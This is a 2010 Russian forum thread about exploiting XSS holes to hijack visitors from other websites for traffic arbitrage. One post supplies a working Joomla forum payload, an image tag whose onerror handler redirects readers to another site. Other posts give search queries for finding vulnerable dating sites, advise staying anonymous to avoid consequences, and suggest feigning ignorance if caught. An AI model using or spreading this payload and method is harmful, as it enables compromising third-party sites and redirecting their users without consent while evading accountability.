Sk8er кури античат, там очень много выкладывают пассивок, иногда даже активки, как достаточно насмотришься примеров, можешь уже и сам искать, просто очень важно проверять все формы, куда можно впихнуть свой текст, кодеры часто что-то пропускают
XSS уязвимость для быстрой добычи тематического трафика
(Ответов: 26, Просмотров: 16752)
- 12.01.2010 12:23
- 12.01.2010 22:58
Помнится, во всех форумах на cms joomla была XSS уязвимость, достаточно было вставить код в сообщение:
Код:и срабатывал редирект[img size=150]http://www.google.com/noimage.jpg"onerror="top.location.href='http://www.site.com';"[/img]
- 13.01.2010 08:38
Интересно, а можешь дать хоть пример сайта где эту дыру закрыли? желательно несколько, можно в личку
Оффтоп: Только заметил, Регистрация у меня 13 числа, и первый мой пост под №13
К чему бы это? Последний раз редактировалось Mr.Evidence; 13.01.2010 в 09:06.
- 13.01.2010 08:47
- 13.01.2010 09:03
- 13.01.2010 13:35
Примера сайта дать не могу, зато могу дать запросы, по которым мы их искали, вот пример для uk
http://www.google.co.uk/ie?num=100&h...=online+dating
И так для каждой страны на её языке.
Естественно, чтоб ничего не было за такие действия, нужно все делать анонимно. - 15.01.2010 20:47
http://itua.info/news/security/22195.html интересная статья про XSS в твиттере
- 16.01.2010 03:58
Ну можно на крайняк гнуть линию "А я не знал, что это баг! Я думал фича!"
- 16.01.2010 12:51
- 16.01.2010 13:39
Тэги топика:
Похожие темы
| Темы | Раздел | Ответов | Последний пост |
|---|---|---|---|
Способы добычи бесплатного контента | Партнерские программы | 32 | 15.12.2009 18:51 |
Вирусный маркетинг как средство добычи тафика. | Партнерские программы | 127 | 28.11.2009 11:46 |
Вирусный маркетинг как средство добычи тафика. | Обучающие статьи | 122 | 27.09.2009 21:15 |
Ещё один способ добычи фри контента | Арбитраж, трафик | 66 | 17.09.2009 10:44 |
Интересные темы
xss уязвимость
Что такое xss уязвимость, как ее можно использовать в своих интересах, читайте подробнее здесь.






